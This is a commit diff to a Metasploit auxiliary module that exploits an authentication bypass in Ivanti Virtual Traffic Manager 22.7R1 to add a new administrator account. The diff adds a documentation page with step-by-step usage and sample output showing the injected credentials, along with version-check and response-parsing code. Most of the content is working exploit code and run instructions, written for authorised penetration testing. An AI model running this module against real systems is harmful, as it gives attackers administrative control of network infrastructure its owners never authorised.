Updated

h4x-x0r · h4x-x0r · commit 7bfc386973f8 · 2024-08-14T04:57:08.000+01:00
added error handling, documentation, version check, store_valid_credential
diff --git a/documentation/modules/auxiliary/admin/http/ivanti_vtm_admin.md b/documentation/modules/auxiliary/admin/http/ivanti_vtm_admin.md
@@ -0,0 +1,50 @@
+## Vulnerable Application
+
+This module exploits an access control issue in Ivanti Virtual Traffic Manager (VTM) 22.7R1, by adding a new
+administrative user to the web interface of the application.
+
+The original advisory is available [here](https://packetstormsecurity.com/files/179906).
+
+## Testing
+
+The software can be obtained from [here](https://hubgw.docker.com/r/pulsesecure/vtm).
+
+**Successfully tested on**
+
+- 22.7R1 on Ubuntu 20.04.6 LTS
+
+## Verification Steps
+
+1. Deploy Ivanti Virtual Traffic Manager (VTM)
+2. Start `msfconsole`
+3. `use auxiliary/admin/http/ivanti_vtm_admin`
+4. `set RHOSTS <IP>`
+5. `run`
+6. A new admin user should have been added to the web interface.
+
+## Options
+
+### NEW_USERNAME
+Username to be used when creating a new user with admin privileges.
+
+### NEW_PASSWORD
+Password to be used when creating a new user with admin privileges.
+
+## Scenarios
+
+Running the module against Virtual Traffic Manager (VTM) 22.7R1 should result in an output
+similar to the following:
+
+```
+msf6 > use auxiliary/admin/http/ivanti_vtm_admin 
+msf6 auxiliary(admin/http/ivanti_vtm_admin) > set RHOSTS 172.17.0.2
+msf6 auxiliary(admin/http/ivanti_vtm_admin) > exploit 
+[*] Running module against 172.17.0.2
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version: 22.7R1
+[+] New admin user was successfully added:
+	h4x0r:w00Tw00T!
+[+] Login at: https://172.17.0.2:9090/apps/zxtm/login.cgi
+[*] Auxiliary module execution completed
+```
diff --git a/modules/auxiliary/admin/http/ivanti_vtm_admin.rb b/modules/auxiliary/admin/http/ivanti_vtm_admin.rb
@@ -1,25 +1,27 @@
 class MetasploitModule < Msf::Auxiliary
   include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
       update_info(
         info,
         'Name' => 'Ivanti Virtual Traffic Manager Authentication Bypass',
         'Description' => %q{
-          This module exploits an access control issue in Ivanti Virtual Traffic Manager <= 22.7R2, by adding a new
+          This module exploits an access control issue in Ivanti Virtual Traffic Manager 22.7R1, by adding a new
           administrative user to the web interface of the application.
         },
         'Author' => [
           'Michael Heinzl', # MSF Module
           'ohnoisploited' # Discovery and PoC
         ],
         'References' => [
-          ['URL', 'https://packetstormsecurity.com/files/179906']
+          ['PACKETSTORM', '179906']
         ],
         'DisclosureDate' => '2024-08-05',
         'DefaultOptions' => {
-          'RPORT' => 9090
+          'RPORT' => 9090,
+          'SSL' => 'True'
         },
         'License' => MSF_LICENSE,
         'Notes' => {
@@ -37,6 +39,29 @@ def initialize(info = {})
     ])
   end
 
+  def check
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri, 'apps', 'zxtm', 'login.cgi')
+      }
+    )
+
+    return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
+
+    body = res.body
+    version_regex = /StingrayVersion\.Set\(\s*'([^']+)'\s*,/
+    match = body.match(version_regex)
+    if match
+      version = match[1]
+      return Exploit::CheckCode::Appears("Version: #{version}") if version <= Rex::Version.new('22.7R1')
+    else
+      return Exploit::CheckCode::Safe
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
   def run
     res = send_request_cgi(
       'method' => 'POST',
@@ -48,16 +73,27 @@ def run
         'newusername' => datastore['NEW_USERNAME'],
         'password1' => datastore['NEW_PASSWORD'],
         'password2' => datastore['NEW_PASSWORD']
-
       }
     )
 
     unless res
       fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.')
     end
 
-    print_good("New admin user was successfully injected:\n\t#{datastore['NEW_USERNAME']}:#{datastore['NEW_PASSWORD']}")
-    print_good("Login at: http://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}workflow/jsp/logon.jsp")
-  end
+    html = res.get_html_document
+    title_tag = html.at_css('title')
 
+    if title_tag
+      title_text = title_tag.text.strip
+      if title_text == '2'
+        store_valid_credential(user: datastore['NEW_USERNAME'], private: datastore['NEW_PASSWORD'], proof: html)
+        print_good("New admin user was successfully added:\n\t#{datastore['NEW_USERNAME']}:#{datastore['NEW_PASSWORD']}")
+        print_good("Login at: https://#{datastore['RHOSTS']}:#{datastore['RPORT']}#{datastore['TARGETURI']}apps/zxtm/login.cgi")
+      else
+        fail_with(Failure::UnexpectedReply, 'Unexpected string found inside the title tag: ' + title_text)
+      end
+    else
+      fail_with(Failure::UnexpectedReply, 'title tag not found.')
+    end
+  end
 end
